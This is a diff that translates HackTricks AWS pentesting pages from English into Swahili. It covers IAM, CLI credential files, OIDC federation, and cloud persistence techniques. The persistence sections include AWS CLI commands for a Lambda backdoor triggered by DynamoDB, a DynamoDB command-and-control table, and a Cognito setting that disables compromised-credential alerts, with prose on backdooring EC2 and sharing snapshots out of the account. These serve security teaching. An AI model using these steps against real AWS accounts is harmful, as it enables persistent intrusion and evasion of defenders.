-- You can **download "Credential Report"** with information about current credentials (like user creation time, is password enabled...). You can generate a credential report as often as once every **four hours**.
+- Unaweza **kufafanua mipangilio ya sera ya nywila** kama urefu wa chini na mahitaji ya nywila.
+- Unaweza **kupakua "Ripoti ya Akiba"** yenye taarifa kuhusu akiba za sasa (kama wakati wa kuunda mtumiaji, ikiwa nywila imewekwa...). Unaweza kuunda ripoti ya akiba mara kwa mara kama mara moja kila **saa nne**.
-AWS Identity and Access Management (IAM) provides **fine-grained access control** across all of AWS. With IAM, you can specify **who can access which services and resources**, and under which conditions. With IAM policies, you manage permissions to your workforce and systems to **ensure least-privilege permissions**.
+Usimamizi wa Utambulisho na Ufikiaji wa AWS (IAM) unatoa **udhibiti wa ufikiaji wa kina** katika AWS yote. Kwa IAM, unaweza kufafanua **nani anaweza kufikia huduma na rasilimali zipi**, na chini ya hali zipi. Kwa sera za IAM, unasimamia ruhusa kwa wafanyakazi na mifumo yako ili **kuhakikisha ruhusa za chini zaidi**.
-### IAM ID Prefixes
+### Awali za ID za IAM
-In [**this page**](https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_identifiers.html#identifiers-unique-ids) you can find the **IAM ID prefixe**d of keys depending on their nature:
+Katika [**ukurasa huu**](https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_identifiers.html#identifiers-unique-ids) unaweza kupata **awali za ID za IAM** za funguo kulingana na asili yao:
-| ABIA | [AWS STS service bearer token](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_bearer.html) |
+| ABIA | [Token ya mtoa huduma ya AWS STS](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_bearer.html) |
| ---- | -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
-| ACCA | Context-specific credential |
-| AGPA | User group |
-| AIDA | IAM user |
-| AIPA | Amazon EC2 instance profile |
-| AKIA | Access key |
-| ANPA | Managed policy |
-| ANVA | Version in a managed policy |
-| APKA | Public key |
-| AROA | Role |
-| ASCA | Certificate |
-| ASIA | [Temporary (AWS STS) access key IDs](https://docs.aws.amazon.com/STS/latest/APIReference/API_Credentials.html) use this prefix, but are unique only in combination with the secret access key and the session token. |
+| ACCA | Akiba maalum ya muktadha |
+| AGPA | Kundi la mtumiaji |
+| AIDA | Mtumiaji wa IAM |
+| AIPA | Profaili ya mfano wa Amazon EC2 |
+| AKIA | Funguo ya ufikiaji |
+| ANPA | Sera iliyosimamiwa |
+| ANVA | Toleo katika sera iliyosimamiwa |
+| APKA | Funguo ya umma |
+| AROA | Jukumu |
+| ASCA | Cheti |
+| ASIA | [Funguo za ufikiaji za muda (AWS STS)](https://docs.aws.amazon.com/STS/latest/APIReference/API_Credentials.html) tumia awali hii, lakini ni za kipekee tu kwa pamoja na funguo ya siri ya ufikiaji na tokeni ya kikao. |
-### Recommended permissions to audit accounts
+### Ruhusa zinazopendekezwa kukagua akaunti
-The following privileges grant various read access of metadata:
+Ruhusa zifuatazo zinatoa ufikiaji wa kusoma wa metadata:
- `arn:aws:iam::aws:policy/SecurityAudit`
- `arn:aws:iam::aws:policy/job-function/ViewOnlyAccess`
@@ -336,14 +324,13 @@ The following privileges grant various read access of metadata:
- `directconnect:DescribeConnections`
- `dynamodb:ListTables`
-## Misc
+## Mambo Mengine
-### CLI Authentication
-
-In order for a regular user authenticate to AWS via CLI you need to have **local credentials**. By default you can configure them **manually** in `~/.aws/credentials` or by **running** `aws configure`.\
-In that file you can have more than one profile, if **no profile** is specified using the **aws cli**, the one called **`[default]`** in that file will be used.\
-Example of credentials file with more than 1 profile:
+### Uthibitishaji wa CLI
+Ili mtumiaji wa kawaida aidhinishe kwa AWS kupitia CLI unahitaji kuwa na **akiba za ndani**. Kwa kawaida unaweza kuziunda **kwa mikono** katika `~/.aws/credentials` au kwa **kukimbia** `aws configure`.\
+Katika faili hiyo unaweza kuwa na zaidi ya profaili moja, ikiwa **hakuna profaili** iliyotajwa kwa kutumia **aws cli**, ile inayoitwa **`[default]`** katika faili hiyo itatumika.\
+Mfano wa faili la akiba lenye zaidi ya profaili 1:
```
[default]
aws_access_key_id = AKIA5ZDCUJHF83HDTYUT
@@ -354,12 +341,10 @@ aws_access_key_id = AKIA8YDCu7TGTR356SHYT
aws_secret_access_key = uOcdhof683fbOUGFYEQuR2EIHG34UY987g6ff7
region = eu-west-2
```
-
If you need to access **different AWS accounts** and your profile was given access to **assume a role inside those accounts**, you don't need to call manually STS every time (`aws sts assume-role --role-arn --role-session-name sessname`) and configure the credentials.
You can use the `~/.aws/config` file to[ **indicate which roles to assume**](https://docs.aws.amazon.com/cli/latest/userguide/cli-configure-role.html), and then use the `--profile` param as usual (the `assume-role` will be performed in a transparent way for the user).\
-A config file example:
-
+Mfano wa faili la usanidi:
```
[profile acc2]
region=eu-west-2
@@ -368,23 +353,16 @@ role_session_name =
source_profile =
sts_regional_endpoints = regional
```
-
-With this config file you can then use aws cli like:
-
+Na faili hii ya usanidi unaweza kutumia aws cli kama:
```
aws --profile acc2 ...
```
+Ikiwa unatafuta kitu **kama** hiki lakini kwa **browser** unaweza kuangalia **extension** [**AWS Extend Switch Roles**](https://chrome.google.com/webstore/detail/aws-extend-switch-roles/jpmkfafbacpgapdghgdpembnojdlgkdl?hl=en).
-If you are looking for something **similar** to this but for the **browser** you can check the **extension** [**AWS Extend Switch Roles**](https://chrome.google.com/webstore/detail/aws-extend-switch-roles/jpmkfafbacpgapdghgdpembnojdlgkdl?hl=en).
-
-## References
+## Marejeleo
- [https://docs.aws.amazon.com/organizations/latest/userguide/orgs_getting-started_concepts.html](https://docs.aws.amazon.com/organizations/latest/userguide/orgs_getting-started_concepts.html)
- [https://aws.amazon.com/iam/](https://aws.amazon.com/iam/)
- [https://docs.aws.amazon.com/singlesignon/latest/userguide/what-is.html](https://docs.aws.amazon.com/singlesignon/latest/userguide/what-is.html)
{{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-basic-information/aws-federation-abuse.md b/src/pentesting-cloud/aws-security/aws-basic-information/aws-federation-abuse.md
index 73ae6b448..f81491291 100644
--- a/src/pentesting-cloud/aws-security/aws-basic-information/aws-federation-abuse.md
+++ b/src/pentesting-cloud/aws-security/aws-basic-information/aws-federation-abuse.md
@@ -4,84 +4,81 @@
## SAML
-For info about SAML please check:
+Kwa maelezo kuhusu SAML tafadhali angalia:
{{#ref}}
https://book.hacktricks.xyz/pentesting-web/saml-attacks
{{#endref}}
-In order to configure an **Identity Federation through SAML** you just need to provide a **name** and the **metadata XML** containing all the SAML configuration (**endpoints**, **certificate** with public key)
+Ili kuunda **Utambulisho wa Shirikisho kupitia SAML** unahitaji tu kutoa **jina** na **metadata XML** inayojumuisha usanidi wote wa SAML (**mipaka**, **cheti** chenye funguo za umma)
## OIDC - Github Actions Abuse
-In order to add a github action as Identity provider:
-
-1. For _Provider type_, select **OpenID Connect**.
-2. For _Provider URL_, enter `https://token.actions.githubusercontent.com`
-3. Click on _Get thumbprint_ to get the thumbprint of the provider
-4. For _Audience_, enter `sts.amazonaws.com`
-5. Create a **new role** with the **permissions** the github action need and a **trust policy** that trust the provider like:
- - ```json
- {
- "Version": "2012-10-17",
- "Statement": [
- {
- "Effect": "Allow",
- "Principal": {
- "Federated": "arn:aws:iam::0123456789:oidc-provider/token.actions.githubusercontent.com"
- },
- "Action": "sts:AssumeRoleWithWebIdentity",
- "Condition": {
- "StringEquals": {
- "token.actions.githubusercontent.com:sub": [
- "repo:ORG_OR_USER_NAME/REPOSITORY:pull_request",
- "repo:ORG_OR_USER_NAME/REPOSITORY:ref:refs/heads/main"
- ],
- "token.actions.githubusercontent.com:aud": "sts.amazonaws.com"
- }
- }
- }
- ]
- }
- ```
-6. Note in the previous policy how only a **branch** from **repository** of an **organization** was authorized with a specific **trigger**.
-7. The **ARN** of the **role** the github action is going to be able to **impersonate** is going to be the "secret" the github action needs to know, so **store** it inside a **secret** inside an **environment**.
-8. Finally use a github action to configure the AWS creds to be used by the workflow:
+Ili kuongeza hatua ya github kama Mtoa Utambulisho:
+1. Kwa _Aina ya Mtoa_, chagua **OpenID Connect**.
+2. Kwa _URL ya Mtoa_, ingiza `https://token.actions.githubusercontent.com`
+3. Bonyeza _Pata thumbprint_ ili kupata thumbprint ya mtoa
+4. Kwa _Watazamaji_, ingiza `sts.amazonaws.com`
+5. Unda **jukumu jipya** lenye **idhini** zinazohitajika na hatua ya github na **sera ya kuamini** inayomwamini mtoa kama:
+- ```json
+{
+"Version": "2012-10-17",
+"Statement": [
+{
+"Effect": "Allow",
+"Principal": {
+"Federated": "arn:aws:iam::0123456789:oidc-provider/token.actions.githubusercontent.com"
+},
+"Action": "sts:AssumeRoleWithWebIdentity",
+"Condition": {
+"StringEquals": {
+"token.actions.githubusercontent.com:sub": [
+"repo:ORG_OR_USER_NAME/REPOSITORY:pull_request",
+"repo:ORG_OR_USER_NAME/REPOSITORY:ref:refs/heads/main"
+],
+"token.actions.githubusercontent.com:aud": "sts.amazonaws.com"
+}
+}
+}
+]
+}
+```
+6. Kumbuka katika sera iliyopita jinsi tu **tawi** kutoka **hifadhi** ya **shirika** lilihitajika kwa **kichocheo** maalum.
+7. **ARN** ya **jukumu** ambalo hatua ya github itakuwa na uwezo wa **kujifanya** itakuwa "siri" ambayo hatua ya github inahitaji kujua, hivyo **hifadhi** ndani ya **siri** ndani ya **mazingira**.
+8. Hatimaye tumia hatua ya github kuunda AWS creds zitakazotumika na mchakato:
```yaml
name: "test AWS Access"
# The workflow should only trigger on pull requests to the main branch
on:
- pull_request:
- branches:
- - main
+pull_request:
+branches:
+- main
# Required to get the ID Token that will be used for OIDC
permissions:
- id-token: write
- contents: read # needed for private repos to checkout
+id-token: write
+contents: read # needed for private repos to checkout
jobs:
- aws:
- runs-on: ubuntu-latest
- steps:
- - name: Checkout
- uses: actions/checkout@v3
+aws:
+runs-on: ubuntu-latest
+steps:
+- name: Checkout
+uses: actions/checkout@v3
- - name: Configure AWS Credentials
- uses: aws-actions/configure-aws-credentials@v1
- with:
- aws-region: eu-west-1
- role-to-assume:${{ secrets.READ_ROLE }}
- role-session-name: OIDCSession
+- name: Configure AWS Credentials
+uses: aws-actions/configure-aws-credentials@v1
+with:
+aws-region: eu-west-1
+role-to-assume:${{ secrets.READ_ROLE }}
+role-session-name: OIDCSession
- - run: aws sts get-caller-identity
- shell: bash
+- run: aws sts get-caller-identity
+shell: bash
```
-
-## OIDC - EKS Abuse
-
+## OIDC - EKS Dhulumu
```bash
# Crate an EKS cluster (~10min)
eksctl create cluster --name demo --fargate
@@ -91,43 +88,34 @@ eksctl create cluster --name demo --fargate
# Create an Identity Provider for an EKS cluster
eksctl utils associate-iam-oidc-provider --cluster Testing --approve
```
-
-It's possible to generate **OIDC providers** in an **EKS** cluster simply by setting the **OIDC URL** of the cluster as a **new Open ID Identity provider**. This is a common default policy:
-
+Ni rahisi kuunda **OIDC providers** katika **EKS** cluster kwa kuweka **OIDC URL** ya cluster kama **mtoa kitambulisho kipya cha Open ID**. Hii ni sera ya kawaida ya default:
```json
{
- "Version": "2012-10-17",
- "Statement": [
- {
- "Effect": "Allow",
- "Principal": {
- "Federated": "arn:aws:iam::123456789098:oidc-provider/oidc.eks.us-east-1.amazonaws.com/id/20C159CDF6F2349B68846BEC03BE031B"
- },
- "Action": "sts:AssumeRoleWithWebIdentity",
- "Condition": {
- "StringEquals": {
- "oidc.eks.us-east-1.amazonaws.com/id/20C159CDF6F2349B68846BEC03BE031B:aud": "sts.amazonaws.com"
- }
- }
- }
- ]
+"Version": "2012-10-17",
+"Statement": [
+{
+"Effect": "Allow",
+"Principal": {
+"Federated": "arn:aws:iam::123456789098:oidc-provider/oidc.eks.us-east-1.amazonaws.com/id/20C159CDF6F2349B68846BEC03BE031B"
+},
+"Action": "sts:AssumeRoleWithWebIdentity",
+"Condition": {
+"StringEquals": {
+"oidc.eks.us-east-1.amazonaws.com/id/20C159CDF6F2349B68846BEC03BE031B:aud": "sts.amazonaws.com"
+}
+}
+}
+]
}
```
+Hii sera inadhihirisha kwa usahihi kwamba **tu** **EKS cluster** yenye **id** `20C159CDF6F2349B68846BEC03BE031B` inaweza kuchukua jukumu. Hata hivyo, haionyeshi ni akaunti gani ya huduma inaweza kuchukua jukumu hilo, ambayo inamaanisha kwamba **AKAUNTI YOYOTE YA HUDUMA yenye tokeni ya utambulisho wa wavuti** itakuwa **na uwezo wa kuchukua** jukumu hilo.
-This policy is correctly indicating than **only** the **EKS cluster** with **id** `20C159CDF6F2349B68846BEC03BE031B` can assume the role. However, it's not indicting which service account can assume it, which means that A**NY service account with a web identity token** is going to be **able to assume** the role.
-
-In order to specify **which service account should be able to assume the role,** it's needed to specify a **condition** where the **service account name is specified**, such as:
-
+Ili kubainisha **ni akaunti gani ya huduma inapaswa kuwa na uwezo wa kuchukua jukumu,** inahitajika kubainisha **hali** ambapo **jina la akaunti ya huduma limebainishwa**, kama:
```bash
"oidc.eks.region-code.amazonaws.com/id/20C159CDF6F2349B68846BEC03BE031B:sub": "system:serviceaccount:default:my-service-account",
```
-
-## References
+## Marejeleo
- [https://www.eliasbrange.dev/posts/secure-aws-deploys-from-github-actions-with-oidc/](https://www.eliasbrange.dev/posts/secure-aws-deploys-from-github-actions-with-oidc/)
{{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-permissions-for-a-pentest.md b/src/pentesting-cloud/aws-security/aws-permissions-for-a-pentest.md
index 28868b9f1..41e654742 100644
--- a/src/pentesting-cloud/aws-security/aws-permissions-for-a-pentest.md
+++ b/src/pentesting-cloud/aws-security/aws-permissions-for-a-pentest.md
@@ -2,20 +2,16 @@
{{#include ../../banners/hacktricks-training.md}}
-These are the permissions you need on each AWS account you want to audit to be able to run all the proposed AWS audit tools:
+Hizi ndizo ruhusa unazohitaji kwenye kila akaunti ya AWS unayotaka kukagua ili uweze kuendesha zana zote zilizopendekezwa za ukaguzi wa AWS:
-- The default policy **arn:aws:iam::aws:policy/**[**ReadOnlyAccess**](https://us-east-1.console.aws.amazon.com/iam/home#/policies/arn:aws:iam::aws:policy/ReadOnlyAccess)
-- To run [aws_iam_review](https://github.com/carlospolop/aws_iam_review) you also need the permissions:
- - **access-analyzer:List\***
- - **access-analyzer:Get\***
- - **iam:CreateServiceLinkedRole**
- - **access-analyzer:CreateAnalyzer**
- - Optional if the client generates the analyzers for you, but usually it's easier just to ask for this permission)
- - **access-analyzer:DeleteAnalyzer**
- - Optional if the client removes the analyzers for you, but usually it's easier just to ask for this permission)
+- Sera ya default **arn:aws:iam::aws:policy/**[**ReadOnlyAccess**](https://us-east-1.console.aws.amazon.com/iam/home#/policies/arn:aws:iam::aws:policy/ReadOnlyAccess)
+- Ili kuendesha [aws_iam_review](https://github.com/carlospolop/aws_iam_review) unahitaji pia ruhusa zifuatazo:
+- **access-analyzer:List\***
+- **access-analyzer:Get\***
+- **iam:CreateServiceLinkedRole**
+- **access-analyzer:CreateAnalyzer**
+- Hiari ikiwa mteja anaunda wachambuzi kwa ajili yako, lakini kwa kawaida ni rahisi tu kuomba ruhusa hii)
+- **access-analyzer:DeleteAnalyzer**
+- Hiari ikiwa mteja anafuta wachambuzi kwa ajili yako, lakini kwa kawaida ni rahisi tu kuomba ruhusa hii)
{{#include ../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-persistence/README.md b/src/pentesting-cloud/aws-security/aws-persistence/README.md
index f3b45c4d3..5b7f4eaee 100644
--- a/src/pentesting-cloud/aws-security/aws-persistence/README.md
+++ b/src/pentesting-cloud/aws-security/aws-persistence/README.md
@@ -1,6 +1 @@
-# AWS - Persistence
-
-
-
-
-
+# AWS - Uendelevu
diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-api-gateway-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-api-gateway-persistence.md
index 6d2b0ec35..e35ab9075 100644
--- a/src/pentesting-cloud/aws-security/aws-persistence/aws-api-gateway-persistence.md
+++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-api-gateway-persistence.md
@@ -4,7 +4,7 @@
## API Gateway
-For more information go to:
+Kwa maelezo zaidi tembelea:
{{#ref}}
../aws-services/aws-api-gateway-enum.md
@@ -12,25 +12,21 @@ For more information go to:
### Resource Policy
-Modify the resource policy of the API gateway(s) to grant yourself access to them
+Badilisha sera ya rasilimali ya API gateway(s) ili kujipatia ufikiaji.
### Modify Lambda Authorizers
-Modify the code of lambda authorizers to grant yourself access to all the endpoints.\
-Or just remove the use of the authorizer.
+Badilisha msimbo wa waandishi wa lambda ili kujipatia ufikiaji wa mwisho wote.\
+Au ondolewa matumizi ya mwandishi.
### IAM Permissions
-If a resource is using IAM authorizer you could give yourself access to it modifying IAM permissions.\
-Or just remove the use of the authorizer.
+Ikiwa rasilimali inatumia mwandishi wa IAM unaweza kujipatia ufikiaji kwa kubadilisha ruhusa za IAM.\
+Au ondolewa matumizi ya mwandishi.
### API Keys
-If API keys are used, you could leak them to maintain persistence or even create new ones.\
-Or just remove the use of API keys.
+Ikiwa funguo za API zinatumika, unaweza kuvuja ili kudumisha uendelevu au hata kuunda mpya.\
+Au ondolewa matumizi ya funguo za API.
{{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-cognito-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-cognito-persistence.md
index e2e037e53..1947d1c69 100644
--- a/src/pentesting-cloud/aws-security/aws-persistence/aws-cognito-persistence.md
+++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-cognito-persistence.md
@@ -4,7 +4,7 @@
## Cognito
-For more information, access:
+Kwa maelezo zaidi, tembelea:
{{#ref}}
../aws-services/aws-cognito-enum/
@@ -12,16 +12,16 @@ For more information, access:
### User persistence
-Cognito is a service that allows to give roles to unauthenticated and authenticated users and to control a directory of users. Several different configurations can be altered to maintain some persistence, like:
+Cognito ni huduma inayoruhusu kutoa majukumu kwa watumiaji wasio na uthibitisho na watumiaji walio na uthibitisho na kudhibiti directory ya watumiaji. Mipangilio kadhaa tofauti inaweza kubadilishwa ili kudumisha baadhi ya uvumilivu, kama vile:
-- **Adding a User Pool** controlled by the user to an Identity Pool
-- Give an **IAM role to an unauthenticated Identity Pool and allow Basic auth flow**
- - Or to an **authenticated Identity Pool** if the attacker can login
- - Or **improve the permissions** of the given roles
-- **Create, verify & privesc** via attributes controlled users or new users in a **User Pool**
-- **Allowing external Identity Providers** to login in a User Pool or in an Identity Pool
+- **Kuongeza User Pool** inayodhibitiwa na mtumiaji kwa Identity Pool
+- Kutoa **IAM role kwa Identity Pool isiyo na uthibitisho na kuruhusu mchakato wa Basic auth**
+- Au kwa **Identity Pool iliyo na uthibitisho** ikiwa mshambuliaji anaweza kuingia
+- Au **kuboresha ruhusa** za majukumu yaliyotolewa
+- **Kuunda, kuthibitisha & privesc** kupitia sifa zinazodhibitiwa na watumiaji au watumiaji wapya katika **User Pool**
+- **Kuruhusu Watoa Utambulisho wa Nje** kuingia katika User Pool au katika Identity Pool
-Check how to do these actions in
+Angalia jinsi ya kufanya vitendo hivi katika
{{#ref}}
../aws-privilege-escalation/aws-cognito-privesc.md
@@ -29,18 +29,12 @@ Check how to do these actions in
### `cognito-idp:SetRiskConfiguration`
-An attacker with this privilege could modify the risk configuration to be able to login as a Cognito user **without having alarms being triggered**. [**Check out the cli**](https://docs.aws.amazon.com/cli/latest/reference/cognito-idp/set-risk-configuration.html) to check all the options:
-
+Mshambuliaji mwenye ruhusa hii anaweza kubadilisha usanidi wa hatari ili kuweza kuingia kama mtumiaji wa Cognito **bila kuanzisha alama za tahadhari**. [**Angalia cli**](https://docs.aws.amazon.com/cli/latest/reference/cognito-idp/set-risk-configuration.html) ili kuangalia chaguzi zote:
```bash
aws cognito-idp set-risk-configuration --user-pool-id --compromised-credentials-risk-configuration EventFilter=SIGN_UP,Actions={EventAction=NO_ACTION}
```
-
-By default this is disabled:
+Kwa kawaida hii imezimwa:
{{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-dynamodb-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-dynamodb-persistence.md
index 75a824e73..d668fbe93 100644
--- a/src/pentesting-cloud/aws-security/aws-persistence/aws-dynamodb-persistence.md
+++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-dynamodb-persistence.md
@@ -4,7 +4,7 @@
### DynamoDB
-For more information access:
+Kwa maelezo zaidi tembelea:
{{#ref}}
../aws-services/aws-dynamodb-enum.md
@@ -12,56 +12,48 @@ For more information access:
### DynamoDB Triggers with Lambda Backdoor
-Using DynamoDB triggers, an attacker can create a **stealthy backdoor** by associating a malicious Lambda function with a table. The Lambda function can be triggered when an item is added, modified, or deleted, allowing the attacker to execute arbitrary code within the AWS account.
-
+Kwa kutumia vichocheo vya DynamoDB, mshambuliaji anaweza kuunda **backdoor ya siri** kwa kuunganisha kazi ya Lambda yenye uharibifu na jedwali. Kazi ya Lambda inaweza kuchochewa wakati kipengee kinapoongezwa, kubadilishwa, au kufutwa, ikimruhusu mshambuliaji kutekeleza msimbo wowote ndani ya akaunti ya AWS.
```bash
# Create a malicious Lambda function
aws lambda create-function \
- --function-name MaliciousFunction \
- --runtime nodejs14.x \
- --role \
- --handler index.handler \
- --zip-file fileb://malicious_function.zip \
- --region
+--function-name MaliciousFunction \
+--runtime nodejs14.x \
+--role \
+--handler index.handler \
+--zip-file fileb://malicious_function.zip \
+--region
# Associate the Lambda function with the DynamoDB table as a trigger
aws dynamodbstreams describe-stream \
- --table-name TargetTable \
- --region
+--table-name TargetTable \
+--region
# Note the "StreamArn" from the output
aws lambda create-event-source-mapping \
- --function-name MaliciousFunction \
- --event-source \
- --region
+--function-name MaliciousFunction \
+--event-source \
+--region
```
+Ili kudumisha uvumilivu, mshambuliaji anaweza kuunda au kubadilisha vitu katika meza ya DynamoDB, ambayo itasababisha kazi ya Lambda yenye uharibifu. Hii inamruhusu mshambuliaji kutekeleza msimbo ndani ya akaunti ya AWS bila mwingiliano wa moja kwa moja na kazi ya Lambda.
-To maintain persistence, the attacker can create or modify items in the DynamoDB table, which will trigger the malicious Lambda function. This allows the attacker to execute code within the AWS account without direct interaction with the Lambda function.
-
-### DynamoDB as a C2 Channel
-
-An attacker can use a DynamoDB table as a **command and control (C2) channel** by creating items containing commands and using compromised instances or Lambda functions to fetch and execute these commands.
+### DynamoDB kama Kituo cha C2
+Mshambuliaji anaweza kutumia meza ya DynamoDB kama **kituo cha amri na udhibiti (C2)** kwa kuunda vitu vyenye amri na kutumia mifano iliyovunjwa au kazi za Lambda kupata na kutekeleza amri hizi.
```bash
# Create a DynamoDB table for C2
aws dynamodb create-table \
- --table-name C2Table \
- --attribute-definitions AttributeName=CommandId,AttributeType=S \
- --key-schema AttributeName=CommandId,KeyType=HASH \
- --provisioned-throughput ReadCapacityUnits=5,WriteCapacityUnits=5 \
- --region
+--table-name C2Table \
+--attribute-definitions AttributeName=CommandId,AttributeType=S \
+--key-schema AttributeName=CommandId,KeyType=HASH \
+--provisioned-throughput ReadCapacityUnits=5,WriteCapacityUnits=5 \
+--region
# Insert a command into the table
aws dynamodb put-item \
- --table-name C2Table \
- --item '{"CommandId": {"S": "cmd1"}, "Command": {"S": "malicious_command"}}' \
- --region
+--table-name C2Table \
+--item '{"CommandId": {"S": "cmd1"}, "Command": {"S": "malicious_command"}}' \
+--region
```
-
The compromised instances or Lambda functions can periodically check the C2 table for new commands, execute them, and optionally report the results back to the table. This allows the attacker to maintain persistence and control over the compromised resources.
{{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-ec2-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-ec2-persistence.md
index b52ac9e85..ce4194432 100644
--- a/src/pentesting-cloud/aws-security/aws-persistence/aws-ec2-persistence.md
+++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-ec2-persistence.md
@@ -4,55 +4,51 @@
## EC2
-For more information check:
+Kwa maelezo zaidi angalia:
{{#ref}}
../aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/
{{#endref}}
-### Security Group Connection Tracking Persistence
+### Usalama wa Kundi la Kundi la Ufuatiliaji wa Muunganisho
-If a defender finds that an **EC2 instance was compromised** he will probably try to **isolate** the **network** of the machine. He could do this with an explicit **Deny NACL** (but NACLs affect the entire subnet), or **changing the security group** not allowing **any kind of inbound or outbound** traffic.
+Ikiwa mlinzi atagundua kuwa **EC2 instance ilikumbwa na shambulio** atajaribu **kuweka mbali** **mtandao** wa mashine hiyo. Anaweza kufanya hivyo kwa kutumia **Deny NACL** (lakini NACL zinaathiri subnet nzima), au **kubadilisha kundi la usalama** kutoruhusu **aina yoyote ya trafiki ya ndani au nje**.
-If the attacker had a **reverse shell originated from the machine**, even if the SG is modified to not allow inboud or outbound traffic, the **connection won't be killed due to** [**Security Group Connection Tracking**](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/security-group-connection-tracking.html)**.**
+Ikiwa mshambuliaji alikuwa na **reverse shell iliyoanzishwa kutoka kwa mashine**, hata kama SG imebadilishwa kutoruhusu trafiki ya ndani au nje, **muunganisho hautakatwa kutokana na** [**Ufuatiliaji wa Muunganisho wa Kundi la Usalama**](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/security-group-connection-tracking.html)**.**
-### EC2 Lifecycle Manager
+### Meneja wa Mzunguko wa EC2
-This service allow to **schedule** the **creation of AMIs and snapshots** and even **share them with other accounts**.\
-An attacker could configure the **generation of AMIs or snapshots** of all the images or all the volumes **every week** and **share them with his account**.
+Huduma hii inaruhusu **kuandaa** **kuundwa kwa AMIs na snapshots** na hata **kuzishiriki na akaunti nyingine**.\
+Mshambuliaji anaweza kuunda **uzalishaji wa AMIs au snapshots** za picha zote au volumes zote **kila wiki** na **kuzishiriki na akaunti yake**.
-### Scheduled Instances
+### Mifano ya Ratiba
-It's possible to schedule instances to run daily, weekly or even monthly. An attacker could run a machine with high privileges or interesting access where he could access.
+Inawezekana kupanga mifano kufanya kazi kila siku, kila wiki au hata kila mwezi. Mshambuliaji anaweza kuendesha mashine yenye mamlaka ya juu au ufikiaji wa kuvutia ambapo anaweza kufikia.
-### Spot Fleet Request
+### Ombi la Spot Fleet
-Spot instances are **cheaper** than regular instances. An attacker could launch a **small spot fleet request for 5 year** (for example), with **automatic IP** assignment and a **user data** that sends to the attacker **when the spot instance start** and the **IP address** and with a **high privileged IAM role**.
+Mifano ya spot ni **za bei nafuu** kuliko mifano za kawaida. Mshambuliaji anaweza kuzindua **ombile dogo la spot fleet kwa miaka 5** (kwa mfano), kwa **ugawaji wa IP** wa kiotomatiki na **data ya mtumiaji** inayotuma kwa mshambuliaji **wakati mfano wa spot unapoanza** na **anwani ya IP** na **jukumu la IAM lenye mamlaka ya juu**.
-### Backdoor Instances
+### Mifano ya Backdoor
-An attacker could get access to the instances and backdoor them:
+Mshambuliaji anaweza kupata ufikiaji wa mifano na kuziingiza backdoor:
-- Using a traditional **rootkit** for example
-- Adding a new **public SSH key** (check [EC2 privesc options](../aws-privilege-escalation/aws-ec2-privesc.md))
-- Backdooring the **User Data**
+- Kutumia **rootkit** wa jadi kwa mfano
+- Kuongeza **funguo mpya za SSH za umma** (angalia [chaguzi za EC2 privesc](../aws-privilege-escalation/aws-ec2-privesc.md))
+- Kuingiza backdoor kwenye **Data ya Mtumiaji**
-### **Backdoor Launch Configuration**
+### **Mipangilio ya Uzinduzi wa Backdoor**
-- Backdoor the used AMI
-- Backdoor the User Data
-- Backdoor the Key Pair
+- Kuingiza backdoor AMI iliyotumika
+- Kuingiza backdoor Data ya Mtumiaji
+- Kuingiza backdoor Key Pair
### VPN
-Create a VPN so the attacker will be able to connect directly through i to the VPC.
+Unda VPN ili mshambuliaji aweze kuungana moja kwa moja kupitia i hadi VPC.
### VPC Peering
-Create a peering connection between the victim VPC and the attacker VPC so he will be able to access the victim VPC.
+Unda muunganisho wa peering kati ya VPC ya mwathirika na VPC ya mshambuliaji ili aweze kufikia VPC ya mwathirika.
{{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-ecr-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-ecr-persistence.md
index 07928fbd4..336fbf6da 100644
--- a/src/pentesting-cloud/aws-security/aws-persistence/aws-ecr-persistence.md
+++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-ecr-persistence.md
@@ -4,98 +4,88 @@
## ECR
-For more information check:
+Kwa maelezo zaidi angalia:
{{#ref}}
../aws-services/aws-ecr-enum.md
{{#endref}}
-### Hidden Docker Image with Malicious Code
+### Picha ya Docker Iliyojificha yenye Msimbo Mbaya
-An attacker could **upload a Docker image containing malicious code** to an ECR repository and use it to maintain persistence in the target AWS account. The attacker could then deploy the malicious image to various services within the account, such as Amazon ECS or EKS, in a stealthy manner.
+Mshambuliaji anaweza **kupakia picha ya Docker yenye msimbo mbaya** kwenye hifadhi ya ECR na kuitumia kudumisha uvumilivu katika akaunti ya AWS inayolengwa. Mshambuliaji anaweza kisha kupeleka picha hiyo mbaya kwa huduma mbalimbali ndani ya akaunti, kama vile Amazon ECS au EKS, kwa njia ya siri.
-### Repository Policy
-
-Add a policy to a single repository granting yourself (or everybody) access to a repository:
+### Sera ya Hifadhi
+Ongeza sera kwa hifadhi moja ikikupa wewe (au kila mtu) ufikiaji wa hifadhi:
```bash
aws ecr set-repository-policy \
- --repository-name cluster-autoscaler \
